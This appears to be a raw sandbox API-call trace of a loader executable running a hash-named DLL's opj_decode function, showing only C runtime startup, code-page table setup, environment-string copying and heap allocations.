0x4e5ae0 [0137.870] SetLastError (dwErrCode=0x0) [0137.870] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x1200) returned 0x4e5eb0 [0137.872] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0137.872] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0137.872] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0137.872] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0137.872] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_decode" [0137.872] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_decode" [0137.872] GetACP () returned 0x4e4 [0137.872] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x228) returned 0x4dac70 [0137.872] IsValidCodePage (CodePage=0x4e4) returned 1 [0137.872] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0137.872] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0137.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0137.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0137.872] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0137.873] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0137.873] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0137.873] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0137.873] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0137.873] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0137.873] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0137.873] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0137.873] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0137.873] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0137.873] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0137.873] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0137.873] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0137.873] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0137.875] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x1000) returned 0x4e70c0 [0137.875] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0137.875] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0137.875] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0137.875] AreFileApisANSI () returned 1 [0137.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0137.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xc4) returned 0x4d4830 [0137.876] GetEnvironmentStringsW () returned 0x4e80d0* [0137.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x4e6) returned 0x4e8ab0 [0137.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x4e8ab0, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0137.876] FreeEnvironmentStringsW (penv=0x4e80d0) returned 1 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x118) returned 0x4d9ea0 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x1f) returned 0x4db620 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x2e) returned 0x4d98b0 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x31) returned 0x4d4f70 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x3c) returned 0x4e0060 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x31) returned 0x4d4fb0 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x14) returned 0x4d4060 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x24) returned 0x4db800 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xd) returned 0x4d9be0 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x1d) returned 0x4db410 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x31) returned 0x4d4ff0 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x15) returned 0x4d5030 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x17) returned 0x4d25e0 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xe) returned 0x4d3e90 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x69) returned 0x4d3eb0 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x3e) returned 0x4e0830 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x1d) returned 0x4db4a0 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x48) returned 0x4e0600 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x12) returned 0x4d3f30 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x18) returned 0x4d3f50 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x1b) returned 0x4db710 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x1e) returned 0x4db7d0 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x29) returned 0x4e82e0 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x1e) returned 0x4db350 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x6b) returned 0x4db9f0 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x17) returned 0x4dba70 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xf) returned 0x4dba90 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x16) returned 0x4dbab0 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x2a) returned 0x4e85e0 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x29) returned 0x4e8320 [0137.876] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x12) returned 0x4e9230 [0137.877] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x21) returned 0x4db740 [0137.877] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x16) returned 0x4e9090 [0137.877] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x22) returned 0x4db470 [0137.877] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x12) returned 0x4e9350 [0137.877] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e8ab0 | out: hHeap=0x4d0000) returned 1 [0137.878] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0xa3a7) returned 0x4e93b0 [0137.880] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x4db590 [0137.880] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0xa3a7) returned 0x4f3760 [0137.881] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e93b0 | out: hHeap=0x4d0000) returned 1 [0137.881] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0xfef7) returned 0x4fdb10 [0137.883] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x40) returned 0x4e0d80 [0137.883] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0xfef7) returned 0x50da10 [0137.885] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4db590 | out: hHeap=0x4d0000) returned 1 [0137.885] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fdb10 | out: hHeap=0x4d0000) returned 1 [0138.718] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x450) returned 0x4e88e0 [0138.718] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x450) returned 0x51d910 [0138.718] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e88e0 | out: hHeap=0x4d0000) returned 1 [0138.718] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x1ea7) returned 0x51dd70 [0138.718] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0xf40) returned 0x4e93b0 [0138.721] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x7a0) returned 0x4ea300 [0138.721] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x51dd70 | out: hHeap=0x4d0000) returned 1 [0138.721] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e93b0 | out: hHeap=0x4d0000) returned 1 [0138.721] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0xbf0) returned 0x4e93b0 [0138.721] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x51d910 | out: hHeap=0x4d0000) returned 1 [0138.721] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4ea300 | out: hHeap=0x4d0000) returned 1 [0138.721] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x640) returned 0x4e88e0 [0138.721] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x1247) returned 0x51d910 [0138.721] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e93b0 | out: hHeap=0x4d0000) returned 1 [0138.721] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e88e0 | out: hHeap=0x4d0000) returned 1 [0138.721] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x520) returned 0x4e88e0 [0138.721] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x1b56) returned 0x4e93b0 [0138.721] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x51d910 | out: hHeap=0x4d0000) returned 1 [0138.722] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e88e0 | out: hHeap=0x4d0000) returned 1 [0138.722] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x8a0) returned 0x51d910 [0138.722] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x28ed) returned 0x4eaf10 [0138.722] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e93b0 | out: hHeap=0x4d0000) returned 1 [0138.722] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x51d910 | out: hHeap=0x4d0000) returned 1 [0138.722] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x550) returned 0x4e88e0 [0138.722] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e88e0 | out: hHeap=0x4d0000) returned 1 [0138.722] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x2537) returned 0x51d910 [0138.722] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x12b7) returned 0x4e93b0 [0138.722] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x950) returned 0x4ed810 [0138.724] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x51d910 | out: hHeap=0x4d0000) returned 1 [0138.724] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e93b0 | out: hHeap=0x4d0000) returned 1 [0138.724] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x3d4f) returned 